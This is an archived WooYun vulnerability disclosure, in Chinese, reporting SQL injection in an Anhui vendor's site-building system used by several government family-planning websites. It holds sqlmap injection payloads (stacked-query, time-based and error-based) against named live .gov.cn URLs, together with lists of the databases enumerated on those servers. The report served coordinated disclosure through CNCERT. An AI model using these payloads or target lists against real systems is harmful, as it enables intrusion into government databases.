当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080538

漏洞标题:安徽某建站系统多处SQL注入漏洞,影响多个政府网站

相关厂商:安徽人口信息技术有限公司

漏洞作者: 浮萍

提交时间:2014-10-24 18:47

修复时间:2015-01-22 18:48

公开时间:2015-01-22 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-24: 细节已通知厂商并且等待厂商处理中
2014-10-29: 厂商已经确认,细节仅向厂商公开
2014-11-01: 细节向第三方安全合作伙伴开放
2014-12-23: 细节向核心白帽子及相关领域专家公开
2015-01-02: 细节向普通白帽子公开
2015-01-12: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

SQL注入

详细说明:

人口基金在线
http://rkjj.ahpfpc.gov.cn/MenuList.aspx?id=67

Snap9.jpg


输入'

Snap11.jpg


在搜索处输入1'

Snap12.jpg


Snap13.jpg


这里以搜索处为例
注入点http://rkjj.ahpfpc.gov.cn/Newslist.aspx?key=1

sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%' AND 6465=6465 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: key=1%' AND 7089=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (7089=7089) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(104)+CHAR(101)+CHAR(113))) AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: key=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: key=1%' WAITFOR DELAY '0:0:5'--
---


web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库

available databases [27]:
[*] AwardAndHelp
[*] bz_zjblSystem
[*] commom_dwdm
[*] CommonBase_ChiZhou
[*] CommonBase_GuiChi
[*] CommonBase_LDC
[*] CommonBase_LYDX
[*] CommonBase_rkjj
[*] CommonBase_RSCyjzj
[*] CommonBase_SZSF
[*] CommonBase_TongLing
[*] CommonBase_YJZ
[*] ContraceptionReward
[*] demo_rkjj_20120520
[*] jsw_dongzhi
[*] jsw_feidong
[*] jsw_zjblSystem
[*] JSWUSER
[*] Ldc_zjbl
[*] master
[*] model
[*] msdb
[*] P_debt
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] URM_NEW


当前库

current database:    'CommonBase_rkjj'


Snap10.jpg


搜索“技术支持:安徽人口信息技术有限公司”

Snap14.jpg


Snap15.jpg


整理出一些测试用例

http://rkjj.ahpfpc.gov.cn/Newslist.aspx?key=1
http://jlfz.ahpfpc.gov.cn/Newslist.aspx?id=8&&key=1
www.hbsjsw.gov.cn/Newslist.aspx?key=1
yjz.ahpfpc.gov.cn/Newslist.aspx?id=8&&key=1
http://www.fdxjsw.gov.cn/Newslist.aspx?key=1
http://www.czsjsw.gov.cn/Newslist.aspx?key=1
http://ldrk.ahpfpc.gov.cn/Newslist.aspx?id=8&&key=1
http://www.tljsw.gov.cn/Newslist.aspx?id=8&&key=1
http://www.ljpop.gov.cn/LinkList.aspx?id=3


漏洞证明:

淮北市人口和计划生育委员会
注入点:www.hbsjsw.gov.cn/Newslist.aspx?key=1

Snap16.jpg


Snap17.jpg


sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%' AND 7061=7061 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: key=1%' AND 6455=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(108)+CHAR(115)+CHAR(113)+(SELECT (CASE WHEN (6455=6455) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(121)+CHAR(111)+CHAR(113))) AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: key=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: key=1%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


数据库

available databases [10]:
[*] CommonBase
[*] CommonBase_djq
[*] CommonBase_lsq
[*] CommonBase_sx
[*] CommonBase_xsq
[*] DB_HBSJSW_WMCJ
[*] master
[*] model
[*] msdb
[*] tempdb


当前库

current database:    'CommonBase'


---------------
下面不贴图了
人口和计划生育利益导向
http://jlfz.ahpfpc.gov.cn/Newslist.aspx?id=8&&key=1

---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8&&key=1%' AND 3140=3140 AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=8&&key=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=8&&key=1%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库

available databases [27]:
[*] AwardAndHelp
[*] bz_zjblSystem
[*] commom_dwdm
[*] CommonBase_ChiZhou
[*] CommonBase_GuiChi
[*] CommonBase_LDC
[*] CommonBase_LYDX
[*] CommonBase_rkjj
[*] CommonBase_RSCyjzj
[*] CommonBase_SZSF
[*] CommonBase_TongLing
[*] CommonBase_YJZ
[*] ContraceptionReward
[*] demo_rkjj_20120520
[*] jsw_dongzhi
[*] jsw_feidong
[*] jsw_zjblSystem
[*] JSWUSER
[*] Ldc_zjbl
[*] master
[*] model
[*] msdb
[*] P_debt
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] URM_NEW


当前库

current database:    'CommonBase_LYDX'


------------
城市和流动人口服务管理
http://ldrk.ahpfpc.gov.cn/Newslist.aspx?id=8&&key=1

---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8&&key=1%' AND 7666=7666 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=8&&key=1%' AND 2550=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(99)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (2550=2550) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(105)+CHAR(113))) AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=8&&key=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=8&&key=1%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库

available databases [27]:
[*] AwardAndHelp
[*] bz_zjblSystem
[*] commom_dwdm
[*] CommonBase_ChiZhou
[*] CommonBase_GuiChi
[*] CommonBase_LDC
[*] CommonBase_LYDX
[*] CommonBase_rkjj
[*] CommonBase_RSCyjzj
[*] CommonBase_SZSF
[*] CommonBase_TongLing
[*] CommonBase_YJZ
[*] ContraceptionReward
[*] demo_rkjj_20120520
[*] jsw_dongzhi
[*] jsw_feidong
[*] jsw_zjblSystem
[*] JSWUSER
[*] Ldc_zjbl
[*] master
[*] model
[*] msdb
[*] P_debt
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] URM_NEW


当前库

current database:    'CommonBase_LDC'


------------
铜陵
http://www.tljsw.gov.cn/Newslist.aspx?id=8&&key=1

Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8&&key=1%' AND 6311=6311 AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=8&&key=1%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=8&&key=1%' WAITFOR DELAY '0:0:5'--


web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库

available databases [27]:
[*] AwardAndHelp
[*] bz_zjblSystem
[*] commom_dwdm
[*] CommonBase_ChiZhou
[*] CommonBase_GuiChi
[*] CommonBase_LDC
[*] CommonBase_LYDX
[*] CommonBase_rkjj
[*] CommonBase_RSCyjzj
[*] CommonBase_SZSF
[*] CommonBase_TongLing
[*] CommonBase_YJZ
[*] ContraceptionReward
[*] demo_rkjj_20120520
[*] jsw_dongzhi
[*] jsw_feidong
[*] jsw_zjblSystem
[*] JSWUSER
[*] Ldc_zjbl
[*] master
[*] model
[*] msdb
[*] P_debt
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] URM_NEW


当前库

current database:    'CommonBase_TongLing'


-------
庐山
www.ljpop.gov.cn/Newslist.aspx?id=8&&key=1

Place: GET
Parameter: key
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=8&&key=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=8&&key=1' WAITFOR DELAY '0:0:5'--
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


数据库

Snap18.jpg


Snap21.jpg


......

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-10-29 09:05

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论